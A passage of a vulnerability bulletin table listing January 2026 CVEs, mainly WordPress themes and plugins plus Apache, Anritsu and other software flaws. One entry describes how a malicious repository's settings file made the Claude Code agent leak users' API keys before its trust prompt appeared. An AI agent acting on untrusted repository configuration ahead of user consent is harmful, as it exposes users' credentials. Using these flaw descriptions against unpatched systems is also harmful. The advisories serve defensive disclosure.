| AncoraThemes--Hobo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Hobo hobo allows PHP Local File Inclusion. This issue affects Hobo: from n/a through <= 1.0.10. | 2026-01-22 | not yet calculated | CVE-2025-69077 | https://patchstack.com/database/Wordpress/Theme/hobo/vulnerability/wordpress-hobo-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Indoor Plants | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Indoor Plants indoor-plants allows PHP Local File Inclusion. This issue affects Indoor Plants: from n/a through <= 1.2.7. | 2026-01-22 | not yet calculated | CVE-2025-69066 | https://patchstack.com/database/Wordpress/Theme/indoor-plants/vulnerability/wordpress-indoor-plants-theme-1-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Malta | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Malta malta allows PHP Local File Inclusion. This issue affects Malta: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-69078 | https://patchstack.com/database/Wordpress/Theme/malta/vulnerability/wordpress-malta-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Modern Housewife | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Modern Housewife modernhousewife allows PHP Local File Inclusion. This issue affects Modern Housewife: from n/a through <= 1.0.12. | 2026-01-22 | not yet calculated | CVE-2025-69076 | https://patchstack.com/database/Wordpress/Theme/modernhousewife/vulnerability/wordpress-modern-housewife-theme-1-0-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--MoveMe | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes MoveMe moveme allows PHP Local File Inclusion. This issue affects MoveMe: from n/a through <= 1.2.15. | 2026-01-22 | not yet calculated | CVE-2025-69061 | https://patchstack.com/database/Wordpress/Theme/moveme/vulnerability/wordpress-moveme-theme-1-2-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Muji | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Muji muji allows PHP Local File Inclusion. This issue affects Muji: from n/a through <= 1.2.0. | 2026-01-22 | not yet calculated | CVE-2025-69068 | https://patchstack.com/database/Wordpress/Theme/muji/vulnerability/wordpress-muji-theme-1-2-0-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--PartyMaker | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes PartyMaker partymaker allows PHP Local File Inclusion. This issue affects PartyMaker: from n/a through <= 1.1.15. | 2026-01-22 | not yet calculated | CVE-2025-69058 | https://patchstack.com/database/Wordpress/Theme/partymaker/vulnerability/wordpress-partymaker-theme-1-1-15-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Pearson Specter | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Pearson Specter pearsonspecter allows PHP Local File Inclusion. This issue affects Pearson Specter: from n/a through <= 1.11.3. | 2026-01-22 | not yet calculated | CVE-2025-69074 | https://patchstack.com/database/Wordpress/Theme/pearsonspecter/vulnerability/wordpress-pearson-specter-theme-1-11-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Pets Land | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Pets Land petsland allows PHP Local File Inclusion. This issue affects Pets Land: from n/a through <= 1.2.8. | 2026-01-22 | not yet calculated | CVE-2025-69064 | https://patchstack.com/database/Wordpress/Theme/petsland/vulnerability/wordpress-pets-land-theme-1-2-8-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Piqes | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Piqes piqes allows PHP Local File Inclusion. This issue affects Piqes: from n/a through <= 1.0.11. | 2026-01-22 | not yet calculated | CVE-2025-69073 | https://patchstack.com/database/Wordpress/Theme/piqes/vulnerability/wordpress-piqes-theme-1-0-11-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Prider | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Prider prider allows PHP Local File Inclusion. This issue affects Prider: from n/a through <= 1.1.3.1. | 2026-01-22 | not yet calculated | CVE-2025-69072 | https://patchstack.com/database/Wordpress/Theme/prider/vulnerability/wordpress-prider-theme-1-1-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Snow Mountain | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Snow Mountain snowmountain allows PHP Local File Inclusion. This issue affects Snow Mountain: from n/a through <= 1.4.3. | 2026-01-22 | not yet calculated | CVE-2025-69065 | https://patchstack.com/database/Wordpress/Theme/snowmountain/vulnerability/wordpress-snow-mountain-theme-1-4-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Tails | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Tails tails allows PHP Local File Inclusion. This issue affects Tails: from n/a through <= 1.4.12. | 2026-01-22 | not yet calculated | CVE-2025-69067 | https://patchstack.com/database/Wordpress/Theme/tails/vulnerability/wordpress-tails-theme-1-4-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--TanTum | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes TanTum tantum allows PHP Local File Inclusion. This issue affects TanTum: from n/a through <= 1.1.13. | 2026-01-22 | not yet calculated | CVE-2025-69071 | https://patchstack.com/database/Wordpress/Theme/tantum/vulnerability/wordpress-tantum-theme-1-1-13-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Tornados | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Tornados tornados allows PHP Local File Inclusion. This issue affects Tornados: from n/a through <= 2.1. | 2026-01-22 | not yet calculated | CVE-2025-69070 | https://patchstack.com/database/Wordpress/Theme/tornados/vulnerability/wordpress-tornados-theme-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--uReach | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes uReach ureach allows PHP Local File Inclusion. This issue affects uReach: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-69060 | https://patchstack.com/database/Wordpress/Theme/ureach/vulnerability/wordpress-ureach-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Weedles | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Weedles weedles allows PHP Local File Inclusion. This issue affects Weedles: from n/a through <= 1.1.12. | 2026-01-22 | not yet calculated | CVE-2025-69062 | https://patchstack.com/database/Wordpress/Theme/weedles/vulnerability/wordpress-weedles-theme-1-1-12-local-file-inclusion-vulnerability?_s_id=cve |
| AncoraThemes--Yolox | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Yolox yolox allows PHP Local File Inclusion. This issue affects Yolox: from n/a through <= 1.0.15. | 2026-01-22 | not yet calculated | CVE-2025-69075 | https://patchstack.com/database/Wordpress/Theme/yolox/vulnerability/wordpress-yolox-theme-1-0-15-local-file-inclusion-vulnerability?_s_id=cve |
| Angel Costa--WP SEO Search | Cross-Site Request Forgery (CSRF) vulnerability in Angel Costa WP SEO Search wp-seo-search allows Cross Site Request Forgery. This issue affects WP SEO Search: from n/a through <= 1.1. | 2026-01-22 | not yet calculated | CVE-2025-67626 | https://patchstack.com/database/Wordpress/Plugin/wp-seo-search/vulnerability/wordpress-wp-seo-search-plugin-1-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Anritsu--ShockLine | Anritsu ShockLine CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu ShockLine. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CHX files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27833. | 2026-01-23 | not yet calculated | CVE-2025-15348 | ZDI-25-1199 |
| Anritsu--ShockLine | Anritsu ShockLine SCPI Race Condition Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Anritsu ShockLine. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SCPI component. The issue results from the lack of proper locking when performing operations on an object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27315. | 2026-01-23 | not yet calculated | CVE-2025-15349 | ZDI-25-1200 |
| Anritsu--VectorStar | Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CHX files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27039. | 2026-01-23 | not yet calculated | CVE-2025-15350 | ZDI-25-1201 |
| Anritsu--VectorStar | Anritsu VectorStar CHX File Parsing Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Anritsu VectorStar. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CHX files. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-27040. | 2026-01-23 | not yet calculated | CVE-2025-15351 | ZDI-25-1202 |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to version 2.0.65, vulnerability in Claude Code's project-load flow allowed malicious repositories to exfiltrate data including Anthropic API keys before users confirmed trust. An attacker-controlled repository could include a settings file that sets ANTHROPIC_BASE_URL to an attacker-controlled endpoint and when the repository was opened, Claude Code would read the configuration and immediately issue API requests before showing the trust prompt, potentially leaking the user's API keys. Users on standard Claude Code auto-update have received this fix already. Users performing manual updates are advised to update to version 2.0.65, which contains a patch, or to the latest version. | 2026-01-21 | not yet calculated | CVE-2026-21852 | https://github.com/anthropics/claude-code/security/advisories/GHSA-jh7p-qr78-84p7 |
| Antideo--Antideo Email Validator | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Antideo Antideo Email Validator antideo-email-validator allows Blind SQL Injection. This issue affects Antideo Email Validator: from n/a through <= 1.0.10. | 2026-01-22 | not yet calculated | CVE-2025-68017 | https://patchstack.com/database/Wordpress/Plugin/antideo-email-validator/vulnerability/wordpress-antideo-email-validator-plugin-1-0-10-sql-injection-vulnerability?_s_id=cve |
| antoniobg--ABG Rich Pins | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in antoniobg ABG Rich Pins abg-rich-pins allows Stored XSS. This issue affects ABG Rich Pins: from n/a through <= 1.1. | 2026-01-23 | not yet calculated | CVE-2026-24558 | https://patchstack.com/database/Wordpress/Plugin/abg-rich-pins/vulnerability/wordpress-abg-rich-pins-plugin-1-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Apache Software Foundation--Apache Linkis | A vulnerability in Apache Linkis. Problem Description When using the JDBC engine and da When using the JDBC engine and data source functionality, if the URL parameter configured on the frontend has undergone multiple rounds of URL encoding, it may bypass the system's checks. This bypass can trigger a vulnerability that allows unauthorized access to system files via JDBC parameters. Scope of Impact This issue affects Apache Linkis: from 1.3.0 through 1.7.0. Severity level moderate Solution Continuously check if the connection information contains the "%" character; if it does, perform URL decoding. Users are recommended to upgrade to version 1.8.0, which fixes the issue. More questions about this vulnerability can be discussed here: https://lists.apache.org/list?dev@linkis.apache.org:2025-9:cve | 2026-01-19 | not yet calculated | CVE-2025-29847 | https://lists.apache.org/thread/03l5rfkgdt022o75jp8x4tzpqxz8g057 |
| Apache Software Foundation--Apache Linkis | A vulnerability. When org.apache.linkis.metadata.util.HiveUtils.decode() fails to perform Base64 decoding, it records the complete input parameter string in the log via logger.error(str + "decode failed", e). If the input parameter contains sensitive information such as Hive Metastore keys, plaintext passwords will be left in the log files when decoding fails, resulting in information leakage. Affected Scope Component: Sensitive fields in hive-site.xml (e.g., javax.jdo.option.ConnectionPassword) or other fields encoded in Base64. Version: Apache Linkis 1.0.0 - 1.7.0 Trigger Conditions The value of the configuration item is an invalid Base64 string. Log files are readable by users other than hive-site.xml administrators. Severity: Low The probability of Base64 decoding failure is low. The leakage is only triggered when logs at the Error level are exposed. Remediation Apache Linkis 1.8.0 and later versions have replaced the log with desensitized content. logger.error("URL decode failed: {}", e.getMessage()); // ä¸å†è¾“出 str Users are recommended to upgrade to version 1.8.0, which fixes the issue. | 2026-01-19 | not yet calculated | CVE-2025-59355 | https://lists.apache.org/thread/75z7vhftw6w1mllndgpkfmcj0fzo4lbj https://lists.apache.org/thread/4dcgmqdkk2p5y4k43ok5rgd4ylx8698h |
| Apache Software Foundation--Apache Solr | Deployments of Apache Solr 5.3.0 through 9.10.0 that rely on Solr's "Rule Based Authorization Plugin" are vulnerable to allowing unauthorized access to certain Solr APIs, due to insufficiently strict input validation in those components. Only deployments that meet all of the following criteria are impacted by this vulnerability: * Use of Solr's "RuleBasedAuthorizationPlugin" * A RuleBasedAuthorizationPlugin config (see security.json) that specifies multiple "roles" * A RuleBasedAuthorizationPlugin permission list (see security.json) that uses one or more of the following pre-defined permission rules: "config-read", "config-edit", "schema-read", "metrics-read", or "security-read". * A RuleBasedAuthorizationPlugin permission list that doesn't define the "all" pre-defined permission * A networking setup that allows clients to make unfiltered network requests to Solr. (i.e. user-submitted HTTP/HTTPS requests reach Solr as-is, unmodified or restricted by any intervening proxy or gateway) Users can mitigate this vulnerability by ensuring that their RuleBasedAuthorizationPlugin configuration specifies the "all" pre-defined permission and associates the permission with an "admin" or other privileged role. Users can also upgrade to a Solr version outside of the impacted range, such as the recently released Solr 9.10.1. | 2026-01-21 | not yet calculated | CVE-2026-22022 | https://lists.apache.org/thread/d59hqbgo7p62myq7mgfpz7or8n1j7wbn |
| Apache Software Foundation--Apache Solr | The "create core" API of Apache Solr 8.6 through 9.10.0 lacks sufficient input validation on some API parameters, which can cause Solr to check the existence of and attempt to read file-system paths that should be disallowed by Solr's "allowPaths" security setting https://https://solr.apache.org/guide/solr/latest/configuration-guide/configuring-solr-xml.html#the-solr-element . These read-only accesses can allow users to create cores using unexpected configsets if any are accessible via the filesystem. On Windows systems configured to allow UNC paths this can additionally cause disclosure of NTLM "user" hashes. Solr deployments are subject to this vulnerability if they meet the following criteria: * Solr is running in its "standalone" mode. * Solr's "allowPath" setting is being used to restrict file access to certain directories. * Solr's "create core" API is exposed and accessible to untrusted users. This can happen if Solr's RuleBasedAuthorizationPlugin https://solr.apache.org/guide/solr/latest/deployment-guide/rule-based-authorization-plugin.html is disabled, or if it is enabled but the "core-admin-edit" predefined permission (or an equivalent custom permission) is given to low-trust (i.e. non-admin) user roles. Users can mitigate this by enabling Solr's RuleBasedAuthorizationPlugin (if disabled) and configuring a permission-list that prevents untrusted users from creating new Solr cores. Users should also upgrade to Apache Solr 9.10.1 or greater, which contain fixes for this issue. | 2026-01-21 | not yet calculated | CVE-2026-22444 | https://lists.apache.org/thread/qkrb9dd4xrlqmmq73lrhkbfkttto2d1m |
| Apple--Container | The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0. | 2026-01-22 | not yet calculated | CVE-2026-20613 | https://github.com/apple/containerization/security/advisories/GHSA-cq3j-qj2h-6rv3 |
| Apryse--Apryse | A Local File Inclusion (LFI) and a Server-Side Request Forgery (SSRF) vulnerability was found in the InsertFromHtmlString() function of the Apryse HTML2PDF SDK thru 11.6.0. These vulnerabilities could allow an attacker to read local files on the server or make arbitrary HTTP requests to internal or external services. Both vulnerabilities could lead to the disclosure of sensitive data or potential system takeover. | 2026-01-22 | not yet calculated | CVE-2025-56589 | http://apryse.com https://www.stratascale.com/resource/apryse-server-module-ssrf-lfi/ |
| Apryse--Apryse | An issue was discovered in the InsertFromURL() function of the Apryse HTML2PDF SDK thru 11.10. This vulnerability could allow an attacker to execute arbitrary operating system commands on the local server. | 2026-01-22 | not yet calculated | CVE-2025-56590 | http://apryse.com https://www.stratascale.com/resource/apryse-server-argument-injection-rce/ |
| Aptsys--Aptsys | An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a broken cryptographic function, the hashes can be easily reversed using public tools, exposing user credentials in plaintext. This allows remote attackers to perform unauthorized logins and potentially gain access to sensitive POS operations or backend functions. | 2026-01-23 | not yet calculated | CVE-2025-52026 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| ApusTheme--Drone | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ApusTheme Drone drone allows Reflected XSS. This issue affects Drone: from n/a through <= 1.40. | 2026-01-22 | not yet calculated | CVE-2025-49249 | https://patchstack.com/database/Wordpress/Theme/drone/vulnerability/wordpress-drone-theme-1-40-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| arduino--ArduinoCore-avr | ArduinoCore-avr contains the source code and configuration files of the Arduino AVR Boards platform. A vulnerability in versions prior to 1.8.7 allows an attacker to trigger a stack-based buffer overflow when converting floating-point values to strings with high precision. By passing very large `decimalPlaces` values to the affected String constructors or concat methods, the `dtostrf` function writes beyond fixed-size stack buffers, causing memory corruption and denial of service. Under specific conditions, this could enable arbitrary code execution on AVR-based Arduino boards. ### Patches - The Fix is included starting from the `1.8.7` release available from the following link [ArduinoCore-avr v1.8.7](https://github.com/arduino/ArduinoCore-avr) - The Fixing Commit is available at the following link [1a6a417f89c8901dad646efce74ae9d3ddebfd59](https://github.com/arduino/ArduinoCore-avr/pull/613/commits/1a6a417f89c8901dad646efce74ae9d3ddebfd59) ### References - [ASEC-26-001 ArduinoCore-avr vXXXX Resolves Buffer Overflow Vulnerability](https://support.arduino.cc/hc/en-us/articles/XXXXX) ### Credits - Maxime Rossi Bellom and Ramtine Tofighi Shirazi from SecMate (https://secmate.dev/) | 2026-01-21 | not yet calculated | CVE-2025-69209 | https://github.com/arduino/ArduinoCore-avr/security/advisories/GHSA-pvx3-fm7w-6hjm https://github.com/arduino/ArduinoCore-avr/pull/613 https://github.com/arduino/ArduinoCore-avr/commit/82a8ad2fb33911d8927c7af22e0472b94325d1a7 https://github.com/arduino/ArduinoCore-avr/releases/tag/1.8.7 https://support.arduino.cc/hc/en-us/articles/24985906702748-ASEC-26-001-ArduinoCore-AVR-v1-8-7-Resolves-Stack-Based-Buffer-Overflow-Vulnerability |
| Arevico--WP Simple Redirect | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Arevico WP Simple Redirect wp-simple-redirect allows Reflected XSS. This issue affects WP Simple Redirect: from n/a through <= 1.1. | 2026-01-22 | not yet calculated | CVE-2025-68884 | https://patchstack.com/database/Wordpress/Plugin/wp-simple-redirect/vulnerability/wordpress-wp-simple-redirect-plugin-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| argoproj--argo-workflows | Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Prior to versions 3.6.17 and 3.7.8, stored XSS in the artifact directory listing allows any workflow author to execute arbitrary JavaScript in another user's browser under the Argo Server origin, enabling API actions with the victim's privileges. Versions 3.6.17 and 3.7.8 fix the issue. | 2026-01-21 | not yet calculated | CVE-2026-23960 | https://github.com/argoproj/argo-workflows/security/advisories/GHSA-cv78-6m8q-ph82 https://github.com/argoproj/argo-workflows/commit/159a5c56285ecd4d3bb0a67aeef4507779a44e17 https://github.com/argoproj/argo-workflows/blob/9872c296d29dcc5e9c78493054961ede9fc30797/server/artifacts/artifact_server.go#L194-L244 https://github.com/argoproj/argo-workflows/releases/tag/v3.6.17 https://github.com/argoproj/argo-workflows/releases/tag/v3.7.8 |
| Arksine--moonraker | Moonraker is a Python web server providing API access to Klipper 3D printing firmware. In versions 0.9.3 and below, instances configured with the "ldap" component enabled are vulnerable to LDAP search filter injection techniques via the login endpoint. The 401 error response message can be used to determine whether or not a search was successful, allowing for brute force methods to discover LDAP entries on the server such as user IDs and user attributes. This issue has been fixed in version 0.10.0. | 2026-01-22 | not yet calculated | CVE-2026-24130 | https://github.com/Arksine/moonraker/security/advisories/GHSA-3jqf-v4mv-747g https://github.com/Arksine/moonraker/commit/74c5d8e44c4a4abbfbb06fb991e7ebb9ac947f42 |
| Arraytics--Eventin | Deserialization of Untrusted Data vulnerability in Arraytics Eventin wp-event-solution allows Object Injection. This issue affects Eventin: from n/a through <= 4.1.1. | 2026-01-22 | not yet calculated | CVE-2025-68047 | https://patchstack.com/database/Wordpress/Plugin/wp-event-solution/vulnerability/wordpress-eventin-plugin-4-0-52-php-object-injection-vulnerability?_s_id=cve |
| artbees--JupiterX Core | Deserialization of Untrusted Data vulnerability in artbees JupiterX Core jupiterx-core allows Object Injection. This issue affects JupiterX Core: from n/a through <= 4.10.1. | 2026-01-22 | not yet calculated | CVE-2025-50004 | https://patchstack.com/database/Wordpress/Plugin/jupiterx-core/vulnerability/wordpress-jupiterx-core-plugin-4-10-1-php-object-injection-vulnerability?_s_id=cve |
| artplacer--ArtPlacer Widget | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Stored XSS. This issue affects ArtPlacer Widget: from n/a through <= 2.23.1. | 2026-01-23 | not yet calculated | CVE-2026-24555 | https://patchstack.com/database/Wordpress/Plugin/artplacer-widget/vulnerability/wordpress-artplacer-widget-plugin-2-23-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Arul Prasad J--WP Quick Post Duplicator | Missing Authorization vulnerability in Arul Prasad J WP Quick Post Duplicator wp-quick-post-duplicator allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Quick Post Duplicator: from n/a through <= 2.1. | 2026-01-22 | not yet calculated | CVE-2026-24387 | https://patchstack.com/database/Wordpress/Plugin/wp-quick-post-duplicator/vulnerability/wordpress-wp-quick-post-duplicator-plugin-2-1-broken-access-control-vulnerability?_s_id=cve |
| Ashan Perera--LifePress | Missing Authorization vulnerability in Ashan Perera LifePress lifepress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects LifePress: from n/a through <= 2.1.3. | 2026-01-23 | not yet calculated | CVE-2026-24563 | https://patchstack.com/database/Wordpress/Plugin/lifepress/vulnerability/wordpress-lifepress-plugin-2-1-3-broken-access-control-vulnerability-2?_s_id=cve |
| Atomberg--Atomberg | An issue in Atomberg Atomberg Erica Smart Fan Firmware Version: V1.0.36 allows an attacker to obtain sensitive information and escalate privileges via a crafted deauth frame | 2026-01-22 | not yet calculated | CVE-2025-69822 | https://github.com/CipherX1802/CVE-2025-69822-Atomberg_Erica_SmatFan_Security_Assessment/blob/main/Atomberg_Erica_SmatFan_Security_Assessment_Report.pdf https://github.com/CipherX1802/CVE-2025-69822-Atomberg_Erica_SmatFan_Security_Assessment.git |
| Automated Logic--WebCTRL | Storing Passwords in a Recoverable Format vulnerability in Automated Logic WebCTRL on Windows, Carrier i-Vu on Windows. Storing Passwords in a Recoverable Format vulnerability (CWE-257) in the Web session management component allows an attacker to access stored passwords in a recoverable format which makes them subject to password reuse attacks by malicious users. This issue affects WebCTRL: from 6.0 through 9.0; i-Vu: from 6.0 through 9.0. | 2026-01-22 | not yet calculated | CVE-2025-14295 | https://www.corporate.carrier.com/product-security/advisories-resources/ |
| averta--Depicter Slider | Missing Authorization vulnerability in averta Depicter Slider depicter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Depicter Slider: from n/a through <= 4.0.4. | 2026-01-22 | not yet calculated | CVE-2025-68558 | https://patchstack.com/database/Wordpress/Plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-4-0-4-broken-access-control-vulnerability?_s_id=cve |
| axiomthemes--Amuli | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Amuli amuli allows PHP Local File Inclusion. This issue affects Amuli: from n/a through <= 2.3.0. | 2026-01-22 | not yet calculated | CVE-2025-50003 | https://patchstack.com/database/Wordpress/Theme/amuli/vulnerability/wordpress-amuli-theme-2-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| ayecode--Restaurante | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ayecode Restaurante restaurante allows Reflected XSS. This issue affects Restaurante: from n/a through <= 3.0.7. | 2026-01-22 | not yet calculated | CVE-2025-52746 | https://patchstack.com/database/Wordpress/Theme/restaurante/vulnerability/wordpress-restaurante-theme-3-0-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Bdtask--Isshue | HTML Injection vulnerability in Isshue by Bdtask, consisting os an HTML injection due to a lack os proper validation of user input by sending a POST request to '/category_product_search', affecting the 'product_name' parameter. | 2026-01-20 | not yet calculated | CVE-2025-40679 | https://www.incibe.es/en/incibe-cert/notices/aviso-sci/html-injection-isshue-bdtask |
| bdthemes--Element Pack Elementor Addons | Cross-Site Request Forgery (CSRF) vulnerability in bdthemes Element Pack Elementor Addons bdthemes-element-pack-lite allows Cross Site Request Forgery. This issue affects Element Pack Elementor Addons: from n/a through <= 8.3.13. | 2026-01-22 | not yet calculated | CVE-2025-31413 | https://patchstack.com/database/Wordpress/Plugin/bdthemes-element-pack-lite/vulnerability/wordpress-element-pack-elementor-addons-plugin-8-3-13-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Beam--Beam | Directory Traversal vulnerability in Beam beta9 v.0.1.552 allows a remote attacker to obtain sensitive information via the joinCleanPath function | 2026-01-22 | not yet calculated | CVE-2025-69820 | https://github.com/aws/aws-sdk-php/security/advisories/GHSA-557v-xcg6-rm5m https://github.com/ryotaromatsui/CVEs/tree/main/CVE-2025-69820 https://github.com/beam-cloud/beta9/blob/c1cd75e813cf7d53e916157d920099e89ef45caa/pkg/abstractions/volume/multipart.go#L45 |
| Beaver Builder--Beaver Builder | Improper Control of Generation of Code ('Code Injection') vulnerability in Beaver Builder Beaver Builder beaver-builder-lite-version allows Code Injection. This issue affects Beaver Builder: from n/a through <= 2.9.4.1. | 2026-01-22 | not yet calculated | CVE-2025-69319 | https://patchstack.com/database/Wordpress/Plugin/beaver-builder-lite-version/vulnerability/wordpress-beaver-builder-plugin-2-9-4-1-arbitrary-code-execution-vulnerability?_s_id=cve |
| Benjamin Intal--Stackable | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Benjamin Intal Stackable stackable-ultimate-gutenberg-blocks allows Stored XSS. This issue affects Stackable: from n/a through <= 3.19.5. | 2026-01-22 | not yet calculated | CVE-2025-47500 | https://patchstack.com/database/Wordpress/Plugin/stackable-ultimate-gutenberg-blocks/vulnerability/wordpress-stackable-plugin-3-19-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| bestwebsoft--Multilanguage by BestWebSoft | Missing Authorization vulnerability in bestwebsoft Multilanguage by BestWebSoft multilanguage allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Multilanguage by BestWebSoft: from n/a through <= 1.5.2. | 2026-01-23 | not yet calculated | CVE-2026-24598 | https://patchstack.com/database/Wordpress/Plugin/multilanguage/vulnerability/wordpress-multilanguage-by-bestwebsoft-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve |
| Binance--Binance | A buffer over-read in the PublicKey::verify() method of Binance - Trust Wallet Core before commit 5668c67 allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-01-20 | not yet calculated | CVE-2025-66692 | https://github.com/trustwallet/wallet-core/commit/5668c67 https://gist.github.com/inkman97/b791189338f73b758c31a7db3cd50c2d |
| binary-parser--binary-parser | A code injection vulnerability in the binary-parser library prior to version 2.3.0 allows arbitrary JavaScript code execution when untrusted values are used in parser field names or encoding parameters. The library directly interpolates these values into dynamically generated code without sanitization, enabling attackers to execute arbitrary code in the context of the Node.js process. | 2026-01-20 | not yet calculated | CVE-2026-1245 | https://github.com/keichi/binary-parser/pull/283 https://github.com/keichi/binary-parser https://www.npmjs.com/package/binary-parser https://kb.cert.org/vuls/id/102648 |
| blazethemes--Blogistic | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogistic blogistic allows Using Malicious Files. This issue affects Blogistic: from n/a through <= 1.0.5. | 2026-01-22 | not yet calculated | CVE-2025-68909 | https://patchstack.com/database/Wordpress/Theme/blogistic/vulnerability/wordpress-blogistic-theme-1-0-5-arbitrary-file-upload-vulnerability?_s_id=cve |
| blazethemes--Blogmatic | Unrestricted Upload of File with Dangerous Type vulnerability in blazethemes Blogmatic blogmatic. This issue affects Blogmatic: from n/a through <= 1.0.3. | 2026-01-22 | not yet calculated | CVE-2025-62050 | https://patchstack.com/database/Wordpress/Theme/blogmatic/vulnerability/wordpress-blogmatic-theme-1-0-3-arbitrary-file-upload-vulnerability?_s_id=cve |
